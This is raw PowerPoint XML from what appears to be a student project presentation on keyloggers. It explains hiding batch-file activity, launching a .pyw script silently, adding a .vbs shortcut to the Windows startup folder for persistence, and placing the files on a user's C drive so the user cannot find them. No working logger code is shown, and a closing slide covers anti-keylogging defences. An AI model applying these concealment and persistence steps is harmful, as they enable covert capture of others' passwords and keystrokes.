          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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//here using ECHO OFF because bat files are generally interfere in the work of the system ,hence it can be detectible by the user therefor the ECHO OFF will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>disable the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>echoing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>, or displaying on the screen, of characters entered at  the keyboard.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB9472B-831A-4E4B-9ED5-3B3E5CDB3B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7893691" y="2336126"/>
            <a:ext cx="1600200" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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//giving path </a:t>
            </a:r>
            <a:endPar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solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43AD4007-BD6B-4A8B-9304-76F76AE2E6AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2601241"/>
            <a:ext cx="5105400" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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here using batch snippets %CD% ,then giving file name that we have to run</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79C028A4-31F7-448D-85B7-B1D92A3774F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490756" y="3197900"/>
            <a:ext cx="8305800" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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//basically here we are giving the path of program &amp; with the help of that we running our .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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pyw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="18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D001B79-4CD4-460F-8398-771322B0105C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="4751360"/>
            <a:ext cx="53340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//this line can prevent the flashing of our bat file </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E979942F-39FB-4341-84B4-98C6782687A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490756" y="5229226"/>
            <a:ext cx="8119844" cy="1214307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">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Create shortcut of .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> file and copy it into start-up folder(go to run ,type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shell:startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>). Here we are not pasting the original .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> file because the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> file is depended on bat file .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>So by this step whenever the user turn on the system the keylogger automatically starts and records the keys.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307044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B05819-9B24-4D47-B2E9-A1611A2F3073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="304800"/>
            <a:ext cx="4572000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Demonstration &amp; Output :-</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15B3BBF-9FDD-4E4D-B739-9E4A50E17FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="914400"/>
            <a:ext cx="6477000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frist Paste the keyloggers program files to the users system. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>(keep it at C drive so that user cant find it directly.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65F81B5C-A09B-4CAA-9A87-F037BEFB2AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="3041" r="20416" b="33045"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933450" y="1676400"/>
            <a:ext cx="7277100" cy="3202139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B814A2-A159-41FE-9823-BACCE31DA1A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5029200"/>
            <a:ext cx="7543800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, as above side mention After pasting the script shortcut to startup folder , the script starts the program on the startup of the system.  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1536133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F55C9-EFEF-43EE-8731-0339B41F62DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="609600"/>
            <a:ext cx="6477000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever we want to check the log just open the text file in keyloggers program files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4160E55A-A3BB-4CD4-A548-FA3023F404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1000" y="1600200"/>
            <a:ext cx="8305800" cy="4724400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2603506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FC3C1-9BF1-43EB-BEB0-E6A8885B9F5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="457200"/>
            <a:ext cx="8382000" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How to A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Mangal" panose="02040503050203030202" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nwanted keylogging (Anti-Keylogging)-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>	Let’s take a closer look at the methods that can be used to protect against unknown keyloggers or a keylogger designed to target a specific system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>	Since the chief purpose of keyloggers is to get confidential data (bank card numbers, passwords, etc.), the most logical ways to protect against unknown keyloggers are as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>using one-time passwords or two-step authentication,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>using a system with proactive protection designed to detect keylogging software,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>using a virtual keyboard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="01051D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Industry_Medium"/>
              </a:rPr>
              <a:t>Use Key Encryption Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="01051D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Industry_Medium"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="01051D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Industry_Medium"/>
              </a:rPr>
              <a:t>Avoid Downloading Crack Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="01051D"/>
              </a:solidFill>
              <a:latin typeface="Industry_Medium"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Detecting k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>eylogger using Task manager and Program features-</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="01051D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>The Task Manager enables you to see the active applications on the computer. Press </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="01051D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>Ctrl+Alt+Del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="01051D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t> to open Task Manager. In the list of applications, check if there’s any suspicious file, if a keylogger is active, it should be visible in Task Manager. Disable the malicious application.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="01051D"/>
              </a:solidFill>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="01051D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="01051D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins"/>
              </a:rPr>
              <a:t>In Programs and Features, you will see the list of applications you installed on the computer. If an application appears suspicious with an unverified publisher, you can Google it. If it is unnecessary, uninstall it. It could have been installed without your knowledge.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392016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0" y="0"/>
            <a:ext cx="9144000" cy="914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p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Plan of Action</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" baseline="-25000" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="22" name="Content Placeholder 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="905482482"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="1999346"/>
          <a:ext cx="7162800" cy="2859308"/>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914400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Sr. No</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Duration  of Week </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Work</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>  to be done  by  projectees </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
